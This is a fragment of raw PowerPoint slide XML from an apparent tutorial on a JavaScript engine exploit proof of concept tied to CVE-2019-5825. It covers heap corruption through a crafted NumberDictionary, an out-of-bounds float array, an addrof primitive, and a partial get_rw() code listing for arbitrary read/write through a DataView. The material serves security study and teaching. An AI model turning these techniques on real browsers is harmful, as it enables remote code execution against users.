        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="그룹 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408D38D1-9A73-40C2-B33E-2D948DE74050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8198418" y="2344565"/>
            <a:ext cx="3230573" cy="4025957"/>
            <a:chOff x="5384011" y="2076692"/>
            <a:chExt cx="3709143" cy="4101686"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="그림 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F38059-7257-4F1E-8856-AE590CA2BD9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect l="-1410" t="-39" r="41955" b="67553"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5384011" y="2720607"/>
              <a:ext cx="3709143" cy="3457771"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="그림 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74EBD54-558A-4682-87B1-FE5FA315E5C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect t="93776" r="42056"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5469924" y="2076692"/>
              <a:ext cx="3623230" cy="652153"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA675F5A-73BA-4CFE-91BE-2AF93D9AC8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="763008" y="2344565"/>
            <a:ext cx="3155415" cy="2203632"/>
            <a:chOff x="763008" y="2344565"/>
            <a:chExt cx="3155415" cy="2203632"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="직사각형 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AC6032-DA9D-4580-9375-C0B003A91FBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="763009" y="2344565"/>
              <a:ext cx="3155414" cy="11695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ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Array objects that are in the OOB state must be </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>processed</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>by </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>8 bytes when accessing array data by index number. Therefore, this code outputs the upper 32 bits and the lower 32 bits.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600">
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>float_to_high_32bit();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600">
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>float_to_low_32bit();</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7" name="직사각형 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B334ABB-EB7A-4A82-B6FF-20106C3B5D7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="763008" y="3526228"/>
              <a:ext cx="3155414" cy="102196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ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Similarly, when writing data to a float_array object in OOB state, the upper </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>32-bits </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and lower </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>32-bits</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> must be written separately.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600">
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>setHighUint32();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="228600" indent="-228600">
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>setLowUint32();</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CA9DB1-59AB-40A1-BADC-3206C664B997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626187" y="5200971"/>
            <a:ext cx="2361961" cy="11695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Do not add the tarr3 variable here. Adding the tarr3 variable as a global variable changes the length offset position. I recommend updating your code later. That's because modifying the code requires the padding every time.</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16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B805B048-2215-4E30-8575-762D08934A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6430755"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PoC description modified to work with 32-bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="슬라이드 번호 개체 틀 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B51921-BD2E-466F-A0B4-71F27FCB720A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="날짜 개체 틀 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0B632F-32D7-4F13-86D0-01C75C0F2C42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E254A9E2-E2B7-4386-BD27-74EC55EFC3E6}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2240265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6EA12D6-02F0-4F96-B7F7-733A048C47CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381109" y="1169658"/>
            <a:ext cx="11407415" cy="6001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pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>I just changed all the values to type 0x41414141. (or like 0x42424242 Etc) Internally it will be an 8 byte alignment. I've already shown it. In fact, my plan was a 4 byte alignment, but for this case there's no big difference. It is your freedom to use BigInt. I just did my style.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>You must create the “xxx” variable to corrupt float_array. If not, tarr will be corrupted. Think of it as being pushed back one by one. (Same as "CVE-2019-5825")</a:t>
            </a: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7" y="866181"/>
            <a:ext cx="11052923" cy="30777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a:t>Here is the core code for the exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AC6032-DA9D-4580-9375-C0B003A91FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750893" y="1881214"/>
            <a:ext cx="3804380" cy="11695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After the “const o” object is manipulated, the float_array object has a length of 0x4242(0x4242 x 2 = 0x8484). The float_array variable becomes OOB by “delete o[1]”. All variables declared after the float_array variable are accessed. I declared three TypedArray variables and created a DataView. And the following screenshot shows the manipulated length of all of them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404995EF-B9CA-407E-9B9E-1A11B5C7D095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622196" y="1881214"/>
            <a:ext cx="2955245" cy="4647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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function get_rw() {</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let xxx = [];</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const o = {foo: 0x41414141};</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for (let i = 0; i &lt; 15; i++) {</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o[i] = i+16;</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 the first corruption target</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float_array = [0x41414141];</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 = new Uint32Array(2);</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tarr[0] = 0x31313131;</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tarr[1] = 0x32323232;</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tarr2 = new Uint32Array(2);</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tarr2[0] = 0x41414141;</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tarr2[1] = 0x42424242;</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tarr3 = new Uint32Array(2);</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tarr3[0] = 0x43434343;</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tarr3[1] = 0x44444444;</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view = new DataView(tarr3.buffer);</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 object used to imlpement the addrof primitive</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obj_addrof = {'a': 0x31323334/2, 'b': 1};</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obj_addrof['b'] = obj_addrof;</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 build a NumberDictionary inside the FixedArray</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o[0] = 0x08;    // number of elements</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o[1] = 0;       // number of deleted elements</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o[2] = 0x08;    // capacity;</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o[3] = 0x32;    // max key/requires slow elements</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 first element of the NumberDictionary</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o[4] = 0;       // key</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o[5] = 0x4141;  // value</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o[6] = 0xc0;    // PropertyDesc</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8715143B-9E6B-43C2-862A-807BBBF11B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="50882"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8288134" y="1881213"/>
            <a:ext cx="3500390" cy="4647427"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C126F6-DA3E-466A-B572-B27C8D83B8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="76388" r="61246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044122" y="3243160"/>
            <a:ext cx="3217919" cy="3285480"/>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18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449CA324-552C-43BE-B0D5-2F6435030B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361330" y="5145613"/>
            <a:ext cx="1822221" cy="707886"/>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altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note that you need to divide by 2. You will see 0x31323334 in the OOB memory dump. The reasons are already explained in the previous chapter.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="직사각형 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D2CB84-EF6F-49AF-8DD7-C39AC0084C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8288134" y="3269474"/>
            <a:ext cx="1980775" cy="2901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5EB3D18D-E750-4722-A4B3-ACC5E73CE97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854872" y="4587253"/>
            <a:ext cx="1822222" cy="171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연결선: 꺾임 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D522A9FA-D264-4841-A99F-C379DAA666F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677094" y="4672761"/>
            <a:ext cx="1611040" cy="46037"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 68902"/>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64F09C1-80BD-4391-A8F8-302A5C40F7DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361328" y="2348499"/>
            <a:ext cx="1822222" cy="218521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800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finally, hackers aim to complete the creation of DataView using OOB. This is because all arbitrary memory operations will be accessed in the DataView. So all helper functions are also written based on the DataView. If you understand what I'm saying, you could start a fun project like this. Like developing pwntools for JavaScript?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://theori.io/pwnjs/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the DataView is complete, it means that you can completely remove the OOB exploit code part in your brain. We code it this way to use the deficient brain efficiently.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC37A59-C910-4DE2-A4A8-1F6A7923F969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6430755"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PoC description modified to work with 32-bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="슬라이드 번호 개체 틀 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09F4D92-7BA1-46EB-8382-93C27DCFC87B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
